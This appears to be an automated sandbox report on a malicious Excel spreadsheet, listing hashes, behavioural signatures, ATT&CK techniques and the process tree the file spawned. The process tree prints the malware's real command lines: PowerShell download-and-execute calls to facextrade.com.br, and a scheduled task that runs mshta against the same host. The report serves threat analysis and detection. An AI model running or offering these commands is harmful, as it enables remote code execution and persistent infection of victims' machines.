3598a4f8d24a8fbf222fff1b413c7b8409a0f7e099a37c0b1476c6928e76e688

General

Target

SecuriteInfo.com.Exploit.Siggen3.17232.9077.xls
Size

33KB
MD5

78a8eef1db5dba3faff2bead626f205a
SHA1

dea2b77ef05fa0374377f71fb46a226a47124b2c
SHA256

3598a4f8d24a8fbf222fff1b413c7b8409a0f7e099a37c0b1476c6928e76e688
SHA512

aef9e5d9502278c19b82b5f3e57bb57833d7d54c2d1631935df4c509ce2753fb2646a2b82c4eccd9a3d198026011dee3a759ce350fa98facf58142ac0cfafd68

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 4 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.execmd.execmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4836	3220	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4884	3220	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	5056	3220	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4780	3220	cmd.exe	EXCEL.EXE

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

39 4388 powershell.exe
53 3020 powershell.exe

flow	pid	process
39	4388	powershell.exe
53	3020	powershell.exe

Drops file in System32 directory 6 IoCs

Processes:

svchost.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{CC5A5A47-3725-4138-900D-1FB5C5AFBB6E}.catalogItem	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{A471C7D9-5625-4540-9362-E89158221A16}.catalogItem	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{B9BAD1D1-48AE-4F32-9F6B-321036BBEA1C}.catalogItem	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{DD2CE6FB-931A-431E-A78F-E2E4A4604349}.catalogItem	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{04C833F0-E5E8-4130-97DE-C90F47890597}.catalogItem	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{FFD60803-3B8A-4A0E-87C5-75D4A04286AD}.catalogItem	svchost.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

svchost.exeEXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4668 schtasks.exe

pid	process
4668	schtasks.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXEsvchost.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

816 taskkill.exe
Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

4496 PING.EXE
1708 PING.EXE
404 PING.EXE
960 PING.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

3220 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

4388 powershell.exe
4388 powershell.exe
3020 powershell.exe
3020 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

taskkill.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 816 taskkill.exe
Token: SeDebugPrivilege 4388 powershell.exe
Token: SeDebugPrivilege 3020 powershell.exe

pid	process
816	taskkill.exe

pid	process
4496	PING.EXE
1708	PING.EXE
404	PING.EXE
960	PING.EXE

pid	process
4388	powershell.exe
4388	powershell.exe
3020	powershell.exe
3020	powershell.exe

description	pid	process
Token: SeDebugPrivilege	816	taskkill.exe
Token: SeDebugPrivilege	4388	powershell.exe
Token: SeDebugPrivilege	3020	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

EXCEL.EXE

pid	process
3220	EXCEL.EXE
3220	EXCEL.EXE
3220	EXCEL.EXE
3220	EXCEL.EXE
3220	EXCEL.EXE
3220	EXCEL.EXE
3220	EXCEL.EXE
3220	EXCEL.EXE
3220	EXCEL.EXE
3220	EXCEL.EXE
3220	EXCEL.EXE
3220	EXCEL.EXE

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

EXCEL.EXEcmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3220 wrote to memory of 4836	3220	EXCEL.EXE	cmd.exe
PID 3220 wrote to memory of 4836	3220	EXCEL.EXE	cmd.exe
PID 3220 wrote to memory of 4884	3220	EXCEL.EXE	cmd.exe
PID 3220 wrote to memory of 4884	3220	EXCEL.EXE	cmd.exe
PID 3220 wrote to memory of 5056	3220	EXCEL.EXE	cmd.exe
PID 3220 wrote to memory of 5056	3220	EXCEL.EXE	cmd.exe
PID 3220 wrote to memory of 4780	3220	EXCEL.EXE	cmd.exe
PID 3220 wrote to memory of 4780	3220	EXCEL.EXE	cmd.exe
PID 4836 wrote to memory of 1708	4836	cmd.exe	PING.EXE
PID 4836 wrote to memory of 1708	4836	cmd.exe	PING.EXE
PID 5056 wrote to memory of 4496	5056	cmd.exe	PING.EXE
PID 5056 wrote to memory of 4496	5056	cmd.exe	PING.EXE
PID 4780 wrote to memory of 404	4780	cmd.exe	PING.EXE
PID 4780 wrote to memory of 404	4780	cmd.exe	PING.EXE
PID 4884 wrote to memory of 960	4884	cmd.exe	PING.EXE
PID 4884 wrote to memory of 960	4884	cmd.exe	PING.EXE
PID 5056 wrote to memory of 1620	5056	cmd.exe	cmd.exe
PID 5056 wrote to memory of 1620	5056	cmd.exe	cmd.exe
PID 1620 wrote to memory of 4388	1620	cmd.exe	powershell.exe
PID 1620 wrote to memory of 4388	1620	cmd.exe	powershell.exe
PID 5056 wrote to memory of 1888	5056	cmd.exe	cmd.exe
PID 5056 wrote to memory of 1888	5056	cmd.exe	cmd.exe
PID 1888 wrote to memory of 816	1888	cmd.exe	taskkill.exe
PID 1888 wrote to memory of 816	1888	cmd.exe	taskkill.exe
PID 4836 wrote to memory of 1668	4836	cmd.exe	cmd.exe
PID 4836 wrote to memory of 1668	4836	cmd.exe	cmd.exe
PID 1668 wrote to memory of 3020	1668	cmd.exe	powershell.exe
PID 1668 wrote to memory of 3020	1668	cmd.exe	powershell.exe
PID 4884 wrote to memory of 4688	4884	cmd.exe	cmd.exe
PID 4884 wrote to memory of 4688	4884	cmd.exe	cmd.exe
PID 4688 wrote to memory of 4668	4688	cmd.exe	schtasks.exe
PID 4688 wrote to memory of 4668	4688	cmd.exe	schtasks.exe

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
1⤵
- Drops file in System32 directory
- Checks processor information in registry
- Enumerates system info in registry
PID:5040

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen3.17232.9077.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3220

C:\Windows\SYSTEM32\cmd.exe
cmd /c ping -n 80 127.0.0.1 & %public%\Outlook.bat exit
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4836

C:\Windows\system32\PING.EXE
ping -n 80 127.0.0.1
3⤵
- Runs ping.exe
PID:1708

C:\Windows\system32\cmd.exe
cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
3⤵
- Suspicious use of WriteProcessMemory
PID:1668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3020

C:\Windows\SYSTEM32\cmd.exe
cmd /c ping -n 85 127.0.0.1 & %public%\task.bat exit
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4884

C:\Windows\system32\PING.EXE
ping -n 85 127.0.0.1
3⤵
- Runs ping.exe
PID:960

C:\Windows\system32\cmd.exe
cmd /c schtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F
3⤵
- Suspicious use of WriteProcessMemory
PID:4688

C:\Windows\system32\schtasks.exe
schtasks /create /sc MINUTE /mo 200 /tn "CDT" /tr "\"mshta\"http://facextrade.com.br/logs.php" /F
4⤵
- Creates scheduled task(s)
PID:4668

C:\Windows\SYSTEM32\cmd.exe
cmd /c ping -n 10 127.0.0.1 & %public%\DefenderFile.bat exit
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:5056

C:\Windows\system32\PING.EXE
ping -n 10 127.0.0.1
3⤵
- Runs ping.exe
PID:4496

C:\Windows\system32\cmd.exe
cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
3⤵
- Suspicious use of WriteProcessMemory
PID:1620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4388

C:\Windows\system32\cmd.exe
cmd /c start /min taskkill /f /im WINWORD.EXE
3⤵
- Suspicious use of WriteProcessMemory
PID:1888

C:\Windows\system32\taskkill.exe
taskkill /f /im WINWORD.EXE
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:816

C:\Windows\SYSTEM32\cmd.exe
cmd /c ping -n 7 127.0.0.1 & %public%\KilFile.bat exit
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4780

C:\Windows\system32\PING.EXE
ping -n 7 127.0.0.1
3⤵
- Runs ping.exe
PID:404

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4267fc1e87ee23aeb8b9a7d0497091c5

SHA1
59ddae7dc44b8317ff933ad113493eb1644c52c0

SHA256
ff7daa872dda2a5fc4ce7a687bb4193774abb607d489887ffdbbd0ef71bc0d8d

SHA512
1d1b048dc3f01680f4049c23db8e4450f2d59a1174184a340e712d6e4340b3ab6191a254986c98743c5374a693733bfa6ff255b62a7b43809bd79c0804be2beb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
6KB

MD5
aa51e5e20be1448c0591e05d784b59bf

SHA1
5224a48f5cd72577e4b09f2710573f0997f14632

SHA256
d8488d28a56e4daaf7f85162b16dd31f10e8f95567d99c494eb3e5340075d2d3

SHA512
431585e8f69e0efa4252e9d1da1dc7841f10ecd0facd175aa5de42712bbfc4d8c46c0083814e32d1ce1cfecdb8cf679befeb6346621c95786caa681fe354316c

Download Submit
C:\Users\Public\DefenderFile.bat
Filesize
1KB

MD5
ae4a0997ce01f4ebbb3f3cc0054ce933

SHA1
e5bfe3b390f1208b8b6ea0317f4364005f552851

SHA256
a33dd1505c2ac665e6e1fd424a048997ec0f43914b8f73037bd94dc2e89e35ce

SHA512
5de2f43af7756cd7be659d6f03314240e08ecfee7bcb97b45f828ef938a0a0a84b0c36667d0447fd5bfa4851e5eef9cf98182933bda86b42af4a154b37b2f184

Download Submit
C:\Users\Public\Outlook.bat
Filesize
900B

MD5
0427a3545c2eaed3167cffe2cf5f8aba

SHA1
b27f3a7d2b855f1d0b84727603add711bb6f6170

SHA256
ec7da386a5fc7007e33ffdcd8ab64b6ac207d1886e04b9b60f27a95533347391

SHA512
fafb712a5b636c0118128c2d448271680e66fc73fac67538f4b84c9917a7053470d7710ce508cfd82c941942e469bd3d048d7ebbcefa99797542ad026dfe038b

Download Submit
C:\Users\Public\task.bat
Filesize
954B

MD5
20a395a26f50352dc994664c3e7df533

SHA1
9b6407d22297b7af7c49aacd51bf42e51ced7029

SHA256
c6c13b53153f21b2486096732847ddb48b8eb888bd3d6ab93ee1f958fcea1b32

SHA512
2b974da0b7859584e39a9afa2fdf74fb1efba58e68d0c7b420065254f2cf017a8eb393c5f061a12f6ea79c729cebf5f81749b8cf14159ad331aae1daa7701617

Download Submit
memory/404-145-0x0000000000000000-mapping.dmp

Download
memory/816-151-0x0000000000000000-mapping.dmp

Download
memory/960-146-0x0000000000000000-mapping.dmp

Download
memory/1620-148-0x0000000000000000-mapping.dmp

Download
memory/1668-156-0x0000000000000000-mapping.dmp

Download
memory/1708-143-0x0000000000000000-mapping.dmp

Download
memory/1888-150-0x0000000000000000-mapping.dmp

Download
memory/3020-157-0x0000000000000000-mapping.dmp

Download
memory/3020-162-0x00007FF9FB2E0000-0x00007FF9FBDA1000-memory.dmp

Filesize
10.8MB

Download
memory/3020-161-0x00007FF9FB2E0000-0x00007FF9FBDA1000-memory.dmp

Filesize
10.8MB

Download
memory/3220-133-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/3220-135-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/3220-132-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/3220-170-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/3220-169-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/3220-168-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/3220-167-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/3220-138-0x00007FF9E17C0000-0x00007FF9E17D0000-memory.dmp

Filesize
64KB

Download
memory/3220-137-0x00007FF9E17C0000-0x00007FF9E17D0000-memory.dmp

Filesize
64KB

Download
memory/3220-134-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/3220-136-0x00007FF9E3F10000-0x00007FF9E3F20000-memory.dmp

Filesize
64KB

Download
memory/4388-154-0x00007FF9FB2E0000-0x00007FF9FBDA1000-memory.dmp

Filesize
10.8MB

Download
memory/4388-149-0x0000000000000000-mapping.dmp

Download
memory/4388-153-0x00007FF9FB2E0000-0x00007FF9FBDA1000-memory.dmp

Filesize
10.8MB

Download
memory/4388-152-0x0000021CF4870000-0x0000021CF4892000-memory.dmp

Filesize
136KB

Download
memory/4496-144-0x0000000000000000-mapping.dmp

Download
memory/4668-165-0x0000000000000000-mapping.dmp

Download
memory/4688-164-0x0000000000000000-mapping.dmp

Download
memory/4780-142-0x0000000000000000-mapping.dmp

Download
memory/4836-139-0x0000000000000000-mapping.dmp

Download
memory/4884-140-0x0000000000000000-mapping.dmp

Download
memory/5056-141-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads